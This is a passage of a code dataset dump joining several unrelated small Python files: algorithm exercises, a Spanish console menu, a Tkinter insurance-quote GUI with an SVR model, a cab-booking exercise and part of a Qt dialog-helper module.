import views\n\nurlpatterns = [\n path('', views.index),\n path('register', views.register),\n path('login', views.login),\n path('account/<int:id>', views.account),\n path('home', views.home),\n path('editaccount', views.editaccount),\n path('editpw', views.editpw),\n path('library', views.library),\n path('logout', views.logout),\n]","repo_name":"claudia-qr/group_project_podcast_shuffle","sub_path":"shuffle_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12951167256","text":"#Finds a largest increasing subsequence in O(n^2) time\n#algorithm at http://www.algorithmist.com/index.php/Longest_Increasing_Subsequence\ndef LongestSubsequence(array):\n n=len(array)\n q=[0]*n\n prevHigh=[-1]*n # Contains all the previos elements to the increasing sequence\n \n for i in range(n):\n maxLen=0\n for j in range(i):\n if array[i]>array[j] :\n if q[j]>maxLen :\n maxLen=q[j]\n prevHigh[i]=j\n\n q[i]=maxLen+1\n \n idx=q.index(max(q))\n seq=[]\n while(idx!=-1):\n seq=[array[idx]]+seq\n idx=prevHigh[idx]\n \n return seq\n \ndef main():\n print(LongestSubsequence([4,2,6,1,9,0,11,7,12]))\n \n \nif __name__=='__main__':\n main()","repo_name":"mailpraveens/Python-Experiments","sub_path":"Algorithm and solutions/LongestIncreasingSubsequence.py","file_name":"LongestIncreasingSubsequence.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30816439257","text":"import statistics\nimport os\nimport time\ni = 0\nj = 0\ndef buscarmaximo():\n buscarmax = max([1, 2, 27, 7])\n print(\"El maximo valor es: \", buscarmax)\n os.system(\"pause\")\n menu()\ndef buscarminimo():\n buscarmin = min([1, 2, 27, 7])\n print(\"el minimo valor es: \", buscarmin)\n os.system(\"pause\")\n menu()\ndef buscarpromedio():\n promedio = statistics.mean([1, 2, 27, 7])\n print(\"El promedio de los valores es: \", promedio)\n os.system(\"pause\")\n menu()\ndef matrizsuma():\n matriza= ([[1, 2, 3],\n [4, 5, 6],\n [7, 8, 9]])\n matrizb = ([[1, 2, 3],\n [4, 5, 6],\n [7, 8, 9]])\n matrizr = ([[0, 0, 0],\n [0, 0, 0],\n [0, 0, 0]])\n for i in range(3):\n for j in range(3):\n matrizr[i][j] = matriza[i][j] + matrizb[i][j]\n print(\"Primera matriz: \", matriza)\n print(\"Segunda matriz: \", matrizb)\n print(\"matriz resultante: \", matrizr)\n os.system(\"pause\")\n menu()\ndef matrizescalar():\n matriza = ([[1, 2, 3],\n [4, 5, 6],\n [7, 8, 9]])\n matrizr = ([[0, 0, 0],\n [0, 0, 0],\n [0, 0, 0]])\n prod = int(input(\"Valor de la contante escalar: \"))\n for i in range(3):\n for j in range(3):\n matrizr[i][j] = matriza[i][j] * prod\n print (\"Matriz resultante: \", matrizr)\n os.system(\"pause\")\n menu()\ndef menu():\n opcion = 0\n print(\"\"\"\n 1 - Buscar numero maximo\n 2 - Buscar numero minimo\n 3 - Sacar el promedio\n 4 - Sumar matrices\n 5 - Multiplicar matriz escalar\n 6 - Salir\"\"\")\n while (opcion != 6):\n opcion = int(input(\"Ingrese opción: \"))\n if opcion == 1:\n buscarmaximo()\n elif opcion == 2:\n buscarminimo()\n elif opcion == 3:\n buscarpromedio()\n elif opcion == 4:\n matrizsuma()\n elif opcion == 5:\n matrizescalar()\n elif opcion == 6:\n print(\"\"\"Seguro que desea salir?\n Si No\"\"\")\n salir = (str(input(\"Opción: \")))\n if (salir == 'si' or salir == 'Si' or salir == 'SI' or salir == 'sI'):\n print(\"MAIAMEEEE\")\n quit()\n else:\n menu()\n else:\n print('Opcion Incorrecta')\n time.sleep(1)\n 
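# invalid option: pause briefly, then redraw the menu (recursive re-entry rather than relying on the surrounding while loop)\r\n            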
menu()\nprint(\"\"\"\nMenú ejercicios - funciones, vectores - Tomás Cosentino\n\"\"\")\nmenu()","repo_name":"TomasCosen/Ejercicios","sub_path":"Ejercicios funciones vectores/Phyton/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"69859112442","text":"# Вычисление суммы цифр числа\n\ndef dig_sum(number):\n \"\"\"Return sum of digits\"\"\"\n if number < 0:\n number = abs(number)\n if number > 9:\n dig = number % 10\n rem = number // 10\n return dig + dig_sum(rem)\n else:\n return number\n","repo_name":"Alexander-Ageev/Exercises","sub_path":"Recursion/2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8358535787","text":"import tkinter as tk\nfrom tkinter import *\nfrom tkinter import ttk\nimport numpy as np\nimport urllib.request, json\nimport pandas as pd\nimport scipy\nfrom sklearn.svm import SVC\nfrom sklearn.svm import SVR\nfrom sklearn.model_selection import train_test_split\nimport xlrd\n\n\n\n\nwin = tk.Tk()\n\nwin.title(\"Vitech\")\n\nml2 = pd.read_excel('ml.xlsx')\nml2_train = ml2.drop('Gold', axis=1)\nalgo, name = SVR(kernel='rbf', C=1e3, gamma=0.1), 'SVR'\nx_train, x_test, y_train, y_test = train_test_split(ml2_train, ml2['Gold'], test_size=.1, random_state=11)\nalgo.fit(x_train, y_train)\n\n\n\n#name = 'DELUCCA,SHALEE V'\n\n\ndef getParam(id):\n url = 'https://v3v10.vitechinc.com/solr/v_us_quotes/select?indent=on&wt=json&rows=100000&q=id:'+ str(id)\n connection = urllib.request.urlopen(url)\n return pd.DataFrame(json.load(connection)['response']['docs'])\n\ndef find_customer():\n #query to find customer\n name = last.get() + \",\" + first.get()\n name = name.upper()\n url = 'https://v3v10.vitechinc.com/solr/v_us_participant/select?indent=on&wt=json&rows=1000&q=name:' + name + '&fl=name,DOB,sex'\n connection = urllib.request.urlopen(url)\n data = pd.DataFrame(json.load(connection)['response']['docs'])\n #print(data.to_string())\n ID_returned.set(next(iter(data['id'])))\n DOB_returned.set(next(iter(data['DOB']))[0:10])\n gender_returned.set(next(iter(data['sex'])))\n address_returned.set(next(iter(data['address'])) + \"\\n\" + next(iter(data['city'])).upper() + \", \" + next(iter(data['state'])).upper())\n\n quoteDataframe = getParam(next(iter(data['id'])))\n #print(quoteDataframe.to_string())\n\n bronze.set(next(iter(quoteDataframe['BRONZE'])))\n silver.set(next(iter(quoteDataframe['SILVER'])))\n gold.set(next(iter(quoteDataframe['GOLD'])))\n platinum.set(next(iter(quoteDataframe['PLATINUM'])))\n purchased.set(next(iter(quoteDataframe['PURCHASED'])).upper())\n\n calculate_quote()\n\n\n\ndef calculate_quote():\n #use machine learning to get price\n a = age.get()\n inc = income.get()/10000\n ppl = num_people.get()\n if married == \"Single\":\n mar = 0\n else:\n mar=1\n if tobacco == \"No\":\n dip = 0\n else:\n dip =1\n if employment == \"Unemployed\":\n job = 0\n else:\n job =1\n if gender == \"F\":\n sex = 0\n else:\n sex = 1\n\n l = low.get()\n m = med.get()\n h = high.get()\n pred1 = algo.predict([[a, inc, ppl, mar, dip, job, sex, l, m, h]])[0]\n pred1\n\n\n bronze_quote.set(\"TBD\")\n silver_quote.set(\"TBD\")\n gold_quote.set(str(pred1))\n platinum_quote.set(\"TBD\")\n plan_quote.set(\"TBD\")\n\n\n#CREATE TABS\ntabControl = ttk.Notebook(win)\ntab1 = ttk.Frame(tabControl)\ntab2 = ttk.Frame(tabControl)\ntab3 = 
ttk.Frame(tabControl)\ntab4 = ttk.Frame(tabControl)\ntabControl.add(tab1, text=\"Request Quote\")\ntabControl.add(tab2, text=\"Search\")\ntabControl.add(tab3, text=\"Coverage Map\")\ntabControl.add(tab4, text=\"Statistics\")\ntabControl.pack(expand=1, fill=\"both\")\n\n\n#age, income/10000, #people on plan, marriage status (1=married), tobacco, employment status, sex, #low risk, #med risk, #high\n#QUOTE TAB\nquote = ttk.LabelFrame(tab1)\nquote.grid(column=0,row=0,padx=8,pady=4)\nttk.Label(quote, text=\"Gender:\").grid(column=0,row=1,sticky=tk.W)\nttk.Label(quote, text=\"Age:\").grid(column=0,row=2,sticky=tk.W)\nttk.Label(quote, text=\"Number of High Risk Conditions:\").grid(column=0,row=3,sticky=tk.W)\nttk.Label(quote, text=\"Number of Medium Risk Conditions:\").grid(column=0,row=4,sticky=tk.W)\nttk.Label(quote, text=\"Number of Low Risk Conditions:\").grid(column=0,row=5,sticky=tk.W)\nttk.Label(quote, text=\"Income:\").grid(column=0,row=6,sticky=tk.W)\nttk.Label(quote, text=\"Number of People on Plan:\").grid(column=0,row=7,sticky=tk.W)\nttk.Label(quote, text=\"Marital Status:\").grid(column=0,row=8,sticky=tk.W)\nttk.Label(quote, text=\"Tobacce Use:\").grid(column=0,row=9,sticky=tk.W)\nttk.Label(quote, text=\"Employment Status:\").grid(column=0,row=10,sticky=tk.W)\nget_quote = ttk.Button(quote, text=\"Get Quote\", command = calculate_quote).grid(column=0,row=11,pady=20,sticky=tk.W)\nttk.Label(quote, text=\"Bronze Plan Quote:\").grid(column=0,row=12,sticky=tk.W)\nttk.Label(quote, text=\"Silver Plan Quote\").grid(column=0,row=13,sticky=tk.W)\nttk.Label(quote, text=\"Gold Plan Quote:\").grid(column=0,row=14,sticky=tk.W)\nttk.Label(quote, text=\"Platinum Plan Quote:\").grid(column=0,row=15,sticky=tk.W)\nttk.Label(quote, text=\"Plan Recommendation:\").grid(column=0,row=16,sticky=tk.W)\n\n\ngender = tk.StringVar()\nage = tk.IntVar()\nhigh = tk.IntVar()\nmed = tk.IntVar()\nlow = tk.IntVar()\nincome = tk.DoubleVar()\nnum_people = tk.IntVar()\nmarried = tk.StringVar()\ntobacco = tk.StringVar()\nemployment = tk.StringVar()\nbronze_quote = StringVar()\nsilver_quote = StringVar()\ngold_quote = StringVar()\nplatinum_quote = StringVar()\nplan_quote = StringVar()\n\n\ngender_entered = ttk.Combobox(quote, width=12, textvariable=gender, state='readonly')\ngender_entered['values']=(\"F\", \"M\")\ngender_entered.grid(column=1, row=1,sticky=tk.W)\nttk.Entry(quote, width=12, textvariable=age).grid(column=1,row=2,sticky=tk.W)\nnum_high_cond = ttk.Entry(quote, width = 12, textvariable=high).grid(column=1, row=3,sticky=tk.W)\nnum_med_cond = ttk.Entry(quote, width = 12, textvariable=med).grid(column=1, row=4,sticky=tk.W)\nnum_low_cond = ttk.Entry(quote, width = 12, textvariable=low).grid(column=1, row=5,sticky=tk.W)\nttk.Entry(quote, width = 12, textvariable=income).grid(column=1, row=6,sticky=tk.W)\nttk.Entry(quote, width = 12, textvariable=num_people).grid(column=1, row=7,sticky=tk.W)\nmarried_entered = ttk.Combobox(quote, width=12, textvariable=married, state='readonly')\nmarried_entered['values']=(\"Single\", \"Married\")\nmarried_entered.grid(column=1, row=8,sticky=tk.W)\ntobacco_entered = ttk.Combobox(quote, width=12, textvariable=tobacco, state='readonly')\ntobacco_entered['values']=(\"No\", \"Yes\")\ntobacco_entered.grid(column=1, row=9,sticky=tk.W)\nemploy_entered = ttk.Combobox(quote, width=12, textvariable=employment, state='readonly')\nemploy_entered['values']=(\"Unemployed\", \"Employed\")\nemploy_entered.grid(column=1, row=10,sticky=tk.W)\nttk.Label(quote, textvariable = 
bronze_quote).grid(column=1,row=12,sticky=tk.W)\nttk.Label(quote, textvariable = silver_quote).grid(column=1,row=13,sticky=tk.W)\nttk.Label(quote, textvariable = gold_quote).grid(column=1,row=14,sticky=tk.W)\nttk.Label(quote, textvariable = platinum_quote).grid(column=1,row=15,sticky=tk.W)\nttk.Label(quote, textvariable = plan_quote).grid(column=1,row=16,sticky=tk.W)\n\n\n#SEARCH TAB\nsearch = ttk.LabelFrame(tab2)\nsearch.grid(column=0,row=0,padx=8,pady=4)\n\n\nttk.Label(search, text=\"Customer Last Name:\").grid(column=0,row=1,sticky=tk.W)\nttk.Label(search, text=\"Customer First Name:\").grid(column=0,row=2,sticky=tk.W)\nsearch_button = ttk.Button(search, text=\"Search\", command=find_customer).grid(column=0,row=3,pady=12,sticky=tk.W)\nttk.Label(search, text=\"Customer ID:\").grid(column=0,row=4,sticky=tk.W)\nttk.Label(search, text=\"Date of Birth:\").grid(column=0,row=5,sticky=tk.W)\nttk.Label(search, text=\"Gender:\").grid(column=0,row=6,sticky=tk.W)\nttk.Label(search, text=\"Address:\").grid(column=0,row=7,pady=12,sticky=tk.W)\nttk.Label(search, text=\"ACTUAL\").grid(column=1,row=8, pady=4, sticky=tk.W)\nttk.Label(search, text=\"PREDICTED\").grid(column=2,row=8, padx=16,pady=4, sticky=tk.W)\nttk.Label(search, text=\"Bronze Plan Price:\").grid(column=0,row=9,sticky=tk.W)\nttk.Label(search, text=\"Silver Plan Price\").grid(column=0,row=10,sticky=tk.W)\nttk.Label(search, text=\"Gold Plan Price:\").grid(column=0,row=11,sticky=tk.W)\nttk.Label(search, text=\"Platinum Plan Price:\").grid(column=0,row=12,sticky=tk.W)\nttk.Label(search, text=\"Purchased Plan:\").grid(column=0,row=13,sticky=tk.W)\n\nfirst = tk.StringVar()\nlast = tk.StringVar()\nID_returned = tk.StringVar()\nDOB_returned = tk.StringVar()\ngender_returned = tk.StringVar()\naddress_returned = tk.StringVar()\nbronze = tk.StringVar()\nsilver = tk.StringVar()\ngold = tk.StringVar()\nplatinum = tk.StringVar()\npurchased = tk.StringVar()\n\n\nfirst_entered = ttk.Entry(search, width=12, textvariable=first).grid(column=1,row=1,sticky=tk.W)\nlast_entered = ttk.Entry(search, width=12, textvariable=last).grid(column=1,row=2,sticky=tk.W)\nttk.Label(search, textvariable = ID_returned).grid(column=1,row=4,sticky=tk.W)\nttk.Label(search, textvariable = DOB_returned).grid(column=1,row=5,sticky=tk.W)\nttk.Label(search, textvariable = gender_returned).grid(column=1,row=6,sticky=tk.W)\nttk.Label(search, textvariable = address_returned).grid(column=1,row=7,sticky=tk.W)\nttk.Label(search, textvariable = bronze).grid(column=1,row=9,sticky=tk.W)\nttk.Label(search, textvariable = silver).grid(column=1,row=10,sticky=tk.W)\nttk.Label(search, textvariable = gold).grid(column=1,row=11,sticky=tk.W)\nttk.Label(search, textvariable = platinum).grid(column=1,row=12,sticky=tk.W)\nttk.Label(search, textvariable = purchased).grid(column=1,row=13,sticky=tk.W)\n\n#compare quote\nttk.Label(search, textvariable = bronze_quote).grid(column=2,row=9,padx=16,sticky=tk.W)\nttk.Label(search, textvariable = silver_quote).grid(column=2,row=10,padx=16,sticky=tk.W)\nttk.Label(search, textvariable = gold_quote).grid(column=2,row=11,padx=16,sticky=tk.W)\nttk.Label(search, textvariable = platinum_quote).grid(column=2,row=12,padx=16,sticky=tk.W)\nttk.Label(search, textvariable = plan_quote).grid(column=2,row=13,padx=16,sticky=tk.W)\n\n\n#MAP TAB\nmap_tab = ttk.LabelFrame(tab3)\nmap_tab.grid(column=0,row=0,padx=8,pady=4)\n\nmap_image = PhotoImage(file='/Users/Maddie/Desktop/populationdensity.gif')\nmap_button = ttk.Button(map_tab, image=map_image)\nmap_button.pack()\n\n\n#STAT 
TAB\nstats = ttk.LabelFrame(tab4)\nstats.grid(column=0,row=0,padx=8,pady=4)\n\nstat_image = PhotoImage(file='/Users/Maddie/Desktop/graph.gif')\nstat_button= ttk.Button(stats, image=stat_image)\nstat_button.pack()\n\n\n\n\n\nwin.mainloop()\n","repo_name":"cameronjump/HacklahomaVitechFun","sub_path":"GUIwithMachineLearning.py","file_name":"GUIwithMachineLearning.py","file_ext":"py","file_size_in_byte":9802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24767438861","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 27 12:58:34 2017\n\n@author: sap21\n\"\"\"\n\n# hansard.py\n'''\ninto = '.,?()!:-\"' # [\".\",\",\",\"?\"]\nout = \" \"\npunctuation = str.maketrans(into,out)\n\nspeech = open(\"PMQs_181017.txt\")\nfor line in speech:\n line.translate(punctuation)\nspeech.close()\n'''\n\n# exercise 1\ndef remove_punctuation(text):\n into = '.,?()!:-\"' # [\".\",\",\",\"?\"]\n out = \" \"\n punctuation = str.maketrans(into,out)\n\n for line in text:\n string = line.translate(punctuation)\n return string\n ","repo_name":"sap218/python","sub_path":"csm0120/04/hansard.py","file_name":"hansard.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71878404279","text":"from collections import defaultdict\r\nfrom abc import ABC,abstractmethod\r\n#stratedy method\r\ndef Suggest_Driver(car_dict,cab_name,cab_dest=None):\r\n if(cab_name not in car_dict):\r\n return \"Select Another Car Sir!!\"\r\n else:\r\n \r\n driver_name=''\r\n min_dist=10**9\r\n for driver in car_dict[cab_name]:\r\n if(float(driver[1])<4):\r\n continue \r\n else:\r\n if(driver[2]<=min_dist and cab_dest is None):\r\n min_dist=driver[2]\r\n driver_name=driver[0]\r\n elif(driver[2]<=min_dist and cab_dest is not None and cab_dest in driver[3]):\r\n min_dist=driver[2]\r\n driver_name=driver[0]\r\n if(len(driver_name)==0 ):\r\n return \"Could not find suitabel driver for your destination\"\r\n return driver_name\r\nclass Caluclate_Fair(ABC):\r\n @abstractmethod\r\n def Calculate_Fair_taxi(self,cust_distance):\r\n pass \r\nclass Driver_Suggestion:\r\n def __init__(self,car_dict,strategy=None):\r\n self.car_dict=car_dict\r\n self.strategy=strategy\r\n \r\n def Get_Driver_Status(self,cab_name,dest=None):\r\n self.strategy=Suggest_Driver\r\n driver_name=self.strategy(self.car_dict, cab_name,dest)\r\n return driver_name\r\n \r\n \r\n \r\nclass Register_Cab(Driver_Suggestion):\r\n cab_dict=defaultdict(list)\r\n def __init__(self,driver_name=None,cab_model=None,rating=None,dfc=None,dest=None): \r\n self.driver_name=driver_name\r\n self.cab_model=cab_model\r\n self.rating=rating\r\n if(dest is not None):\r\n self.dest=set(dest)\r\n else:\r\n self.dest=dest\r\n self.dfc=dfc \r\n Register_Cab.cab_dict[self.cab_model].append([self.driver_name,self.rating,self.dfc,self.dest])\r\n Driver_Suggestion.__init__(self, Register_Cab.cab_dict)\r\n def Calculate_Fair_taxi(self,cust_distance):\r\n return cust_distance*8\r\n # @staticmethod #utility method\r\n # def Calculate_Fair_taxi(cust_distance):\r\n # return cust_distance*8\r\n \r\n \r\n# #input\r\n# def Amin_input(): \r\n# taxi_num=int(input(\"Enter The total taxi:\"))\r\n# for i in range(taxi_num):\r\n# driver_name=input(\"Enter driver name:\")\r\n# cab_model=input(\"Enter cab model:\")\r\n# rating=float(input(\"Enter druver rating:\"))\r\n# dfc=input(\"Enter distance from customer:\")\r\n# dfc=dfc.split()\r\n# 
if(dfc[1]=='Km'):\r\n# dfc=int(dfc[0])*1000\r\n# else:\r\n# dfc=int(dfc[0])\r\n# dest=list(map(str,input(\"Enter destination details if any\").split()))\r\n# taxi=Register_Cab(driver_name,cab_model,rating,dfc,dest)\r\n# def User_input():\r\n# dist=input(\"Enter total distance:\")\r\n# cab=input(\"ENter car name:\")\r\n# des=list(map(str,input(\"Enter destination details if any\").split()))\r\n# taxi=Register_Cab()\r\n# print(taxi.Get_Driver_Status(cab,des))\r\n# print(taxi.Calculate_Fair_taxi(dist))\r\n# Amin_input()\r\n# User_input()\r\n \r\n \r\n#main function\r\n\r\n# taxi=Register_Cab('A', 'HatchBack', 4 ,500)\r\n# taxi=Register_Cab('B' ,'HatchBack' ,4.3, 1000)\r\n# taxi=Register_Cab('C','5SEATER',4.8,200)\r\n# taxi=Register_Cab('D','Sedan',4.1,700)\r\n# taxi=Register_Cab('E','HatchBack',4.8,430)\r\n# fair=Register_Cab.Calculate_Fair_taxi(20.5)\r\n# driver_status=taxi.Get_Driver_Status('HatchBack')\r\n# print(fair)\r\n# print(driver_status)\r\n\r\n# # # #test case 2;---\r\ntaxi=Register_Cab('A', '5SEATER', 4 ,500,[\"Gurgaon\", \"Noida\", \"Delhi\"])\r\ntaxi=Register_Cab('B' ,'HatchBack' ,4.3, 1000,[\"Gurgaon\"])\r\ntaxi=Register_Cab('C','5SEATER',4.8,200,[\"Noida\"])\r\ntaxi=Register_Cab('D','Sedan',4.1,700,[\"Noida\"])\r\ntaxi=Register_Cab('E','5SEATER',4.7,430,[\"Delhi\"])\r\nfair=taxi.Calculate_Fair_taxi(60)\r\ndriver_status=taxi.Get_Driver_Status(\"5SEATER\",\"Delhi\")\r\nprint(fair)\r\nprint(driver_status)\r\n# # print(Register_Cab.cab_dict)\r\n\r\n# # test case 3\r\n# taxi=Register_Cab('A', 'Sedan', 4 ,500)\r\n# taxi=Register_Cab('B' ,'HatchBack' ,4.3, 1000)\r\n# taxi=Register_Cab('C','5SEATER',4.8,200)\r\n# taxi=Register_Cab('D','Sedan',4.1,700)\r\n# taxi=Register_Cab('E','HatchBack',4.8,430)\r\n# fair=taxi.Calculate_Fair_taxi(20.5)\r\n# driver_status=taxi.Get_Driver_Status('HatchBack')\r\n# print(fair)\r\n# print(driver_status)\r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"123ayush-abs/Object_oriented_design_patterns_problems","sub_path":"rent_optimized.py","file_name":"rent_optimized.py","file_ext":"py","file_size_in_byte":4454,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"40991286252","text":"C = int(input())\n\nfor i in range(C) :\n N = list(map(int, input().split()))\n avg = sum(N[1:]) / N[0]\n over = 0\n\n for k in N[1:] :\n if k > avg :\n over += 1\n su = over / N[0] * 100\n print(\"{:.3f}%\".format(su))\n","repo_name":"toppingh/algorithm","sub_path":"4344번.py","file_name":"4344번.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72595181240","text":"from __future__ import absolute_import, division, print_function\nimport math, time\nimport os, types, io\nimport string, copy\nfrom collections import OrderedDict\n\nimport pandas as pd\n\ntry:\n import configparser\nexcept:\n import ConfigParser as configparser\nfrom .qt import *\nfrom . 
import util, core\n\nmodule_path = os.path.dirname(os.path.abspath(__file__))\niconpath = os.path.join(module_path, 'icons')\n\n\nclass PseudoWidget:\n def __init__(self, val):\n self.val = val\n\n def value(self):\n return self.val\n\n def clear(self):\n pass\n\n def addItems(self, *args):\n pass\n\n\ndef dialogFromOptions(parent, opts, sections=None,\n wrap=2, section_wrap=4,\n style=None):\n \"\"\"\n Get Qt widgets dialog from a dictionary of options.\n Args:\n opts: options dictionary\n sections:\n section_wrap: how many sections in one row\n style: stylesheet css if required\n \"\"\"\n\n sizepolicy = QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)\n sizepolicy.setHorizontalStretch(0)\n sizepolicy.setVerticalStretch(0)\n\n if style == None:\n style = '''\n QLabel {\n font-size: 14px;\n }\n QPlainTextEdit {\n max-height: 80px;\n }\n '''\n\n if sections == None:\n sections = {'options': opts.keys()}\n\n widgets = {}\n dialog = QWidget(parent)\n dialog.setSizePolicy(sizepolicy)\n\n l = QGridLayout(dialog)\n l.setSpacing(1)\n l.setAlignment(QtCore.Qt.AlignLeft)\n scol = 1\n srow = 1\n for s in sections:\n row = srow\n col = 1\n if [1 for op in sections[s] if opts[op][\"type\"] != \"none\"]:\n f = QWidget()\n\n l.addWidget(f, row, scol)\n gl = QGridLayout(f)\n gl.setAlignment(QtCore.Qt.AlignTop)\n gl.setSpacing(3)\n\n for o in sections[s]:\n label = o\n opt = opts[o]\n val = opt['default']\n t = opt['type']\n if t == \"none\":\n widgets[o] = PseudoWidget(val)\n continue\n if 'label' in opt:\n label = opt['label']\n\n lbl = QLabel(label)\n gl.addWidget(lbl, row, col)\n lbl.setStyleSheet(style)\n if t == 'combobox':\n w = QComboBox()\n w.addItems(opt['items'])\n index = w.findText(val)\n if index != -1:\n w.setCurrentIndex(index)\n if 'editable' in opt:\n w.setEditable(True)\n if 'width' in opt:\n w.setMinimumWidth(opt['width'])\n w.resize(opt['width'], 20)\n elif t == 'list':\n w = QListWidget()\n w.setSelectionMode(QAbstractItemView.MultiSelection)\n w.addItems(opt['items'])\n elif t == 'entry':\n w = QLineEdit()\n w.setText(str(val))\n if 'width' in opt:\n w.setMaximumWidth(opt['width'])\n w.resize(opt['width'], 20)\n elif t == 'textarea':\n w = QPlainTextEdit()\n # w.setSizePolicy(sizepolicy)\n w.insertPlainText(str(val))\n elif t == 'slider':\n w = QSlider(QtCore.Qt.Horizontal)\n s, e = opt['range']\n w.setTickInterval(opt['interval'])\n w.setSingleStep(opt['interval'])\n w.setMinimum(s)\n w.setMaximum(e)\n w.setTickPosition(QSlider.TicksBelow)\n w.setValue(val)\n elif t == 'spinbox':\n if type(val) is float:\n w = QDoubleSpinBox()\n else:\n w = QSpinBox()\n w.setValue(val)\n if 'range' in opt:\n min, max = opt['range']\n w.setRange(min, max)\n w.setMinimum(min)\n if 'interval' in opt:\n w.setSingleStep(opt['interval'])\n elif t == 'checkbox':\n w = QCheckBox()\n w.setChecked(val)\n elif t == 'font':\n w = QFontComboBox()\n index = w.findText(val)\n # w.resize(w.sizeHint())\n w.setCurrentIndex(index)\n else:\n raise ValueError(f\"{lbl} option has unavailable type '{t}'\")\n col += 1\n gl.addWidget(w, row, col)\n w.setStyleSheet(style)\n widgets[o] = w\n # print (o, row, col)\n if col >= wrap:\n col = 1\n row += 1\n else:\n col += 2\n\n if scol >= section_wrap:\n scol = 1\n srow += 2\n else:\n scol += 1\n return dialog, widgets\n\n\ndef getWidgetValues(widgets):\n \"\"\"Get values back from a set of widgets\"\"\"\n\n kwds = {}\n for i in widgets:\n val = None\n if i in widgets:\n w = widgets[i]\n if type(w) is QLineEdit:\n val = w.text()\n elif type(w) is QPlainTextEdit:\n val = 
w.toPlainText()\n elif type(w) is QComboBox or type(w) is QFontComboBox:\n val = w.currentText()\n elif type(w) is QListWidget:\n val = [i.text() for i in w.selectedItems()]\n elif type(w) is QCheckBox:\n val = w.isChecked()\n elif type(w) in [QSpinBox, QDoubleSpinBox, QSlider, PseudoWidget]:\n val = w.value()\n if val != None:\n kwds[i] = val\n kwds = kwds\n return kwds\n\n\ndef setWidgetValues(widgets, values):\n \"\"\"Set values for a set of widgets from a dict\"\"\"\n\n kwds = {}\n for i in values:\n val = values[i]\n if i in widgets:\n # print (i, val, type(val))\n w = widgets[i]\n if type(w) is QLineEdit:\n w.setText(str(val))\n elif type(w) is QPlainTextEdit:\n w.insertPlainText(str(val))\n elif type(w) is QComboBox or type(w) is QFontComboBox:\n index = w.findText(val)\n w.setCurrentIndex(index)\n elif type(w) is QCheckBox:\n w.setChecked(val)\n elif type(w) is QSlider:\n w.setValue(val)\n elif type(w) in [QSpinBox, QDoubleSpinBox]:\n w.setValue(val)\n return\n\n\ndef addToolBarItems(toolbar, parent, items):\n \"\"\"Populate toolbar from dict of items\"\"\"\n\n for i in items:\n if 'file' in items[i]:\n iconfile = os.path.join(iconpath, items[i]['file'] + '.png')\n icon = QIcon(iconfile)\n else:\n icon = QIcon.fromTheme(items[i]['icon'])\n btn = QAction(icon, i, parent)\n btn.triggered.connect(items[i]['action'])\n if 'shortcut' in items[i]:\n btn.setShortcut(QKeySequence(items[i]['shortcut']))\n # btn.setCheckable(True)\n toolbar.addAction(btn)\n return toolbar\n\n\nclass PlainTextEditor(QPlainTextEdit):\n def __init__(self, parent=None, **kwargs):\n super(PlainTextEditor, self).__init__(parent, **kwargs)\n font = QFont(\"Monospace\")\n font.setPointSize(10)\n font.setStyleHint(QFont.TypeWriter)\n self.setFont(font)\n return\n\n def zoom(self, delta):\n if delta < 0:\n self.zoomOut(1)\n elif delta > 0:\n self.zoomIn(1)\n\n def contextMenuEvent(self, event):\n\n menu = QMenu(self)\n copyAction = menu.addAction(\"Copy\")\n clearAction = menu.addAction(\"Clear\")\n zoominAction = menu.addAction(\"Zoom In\")\n zoomoutAction = menu.addAction(\"Zoom Out\")\n action = menu.exec_(self.mapToGlobal(event.pos()))\n if action == copyAction:\n self.copy()\n elif action == clearAction:\n self.clear()\n elif action == zoominAction:\n self.zoom(1)\n elif action == zoomoutAction:\n self.zoom(-1)\n\n\nclass TextDialog(QDialog):\n \"\"\"Text edit dialog\"\"\"\n\n def __init__(self, parent, text='', title='Text', width=400, height=300):\n super(TextDialog, self).__init__(parent)\n self.resize(width, height)\n self.setWindowTitle(title)\n vbox = QVBoxLayout(self)\n b = self.textbox = PlainTextEditor(self)\n b.insertPlainText(text)\n b.move(10, 10)\n b.resize(400, 300)\n vbox.addWidget(self.textbox)\n # self.b.setFontFamily('fixed')\n buttonbox = QDialogButtonBox(self)\n buttonbox.setStandardButtons(QDialogButtonBox.Ok)\n buttonbox.button(QDialogButtonBox.Ok).clicked.connect(self.close)\n vbox.addWidget(buttonbox)\n self.show()\n return\n\n\nclass MultipleInputDialog(QDialog):\n \"\"\"Qdialog with multiple inputs\"\"\"\n\n def __init__(self, parent, options=None, title='Input', width=400, height=200):\n super(MultipleInputDialog, self).__init__(parent)\n self.values = None\n self.accepted = False\n self.setMinimumSize(width, height)\n self.setWindowTitle(title)\n dialog, self.widgets = dialogFromOptions(self, options)\n vbox = QVBoxLayout(self)\n vbox.addWidget(dialog)\n buttonbox = QDialogButtonBox(self)\n buttonbox.setStandardButtons(QDialogButtonBox.Cancel | QDialogButtonBox.Ok)\n 
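# OK harvests the widget values via accept() and sets self.accepted; Cancel closes with self.values left as None.\n        # Sketch of a call site (hypothetical 'opts' dict; the dialog is shown non-modally, so read the result after it closes):\n        #   dlg = MultipleInputDialog(parent, options=opts)\n        #   ...once closed: kwds = dlg.values if dlg.accepted else {}\n        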
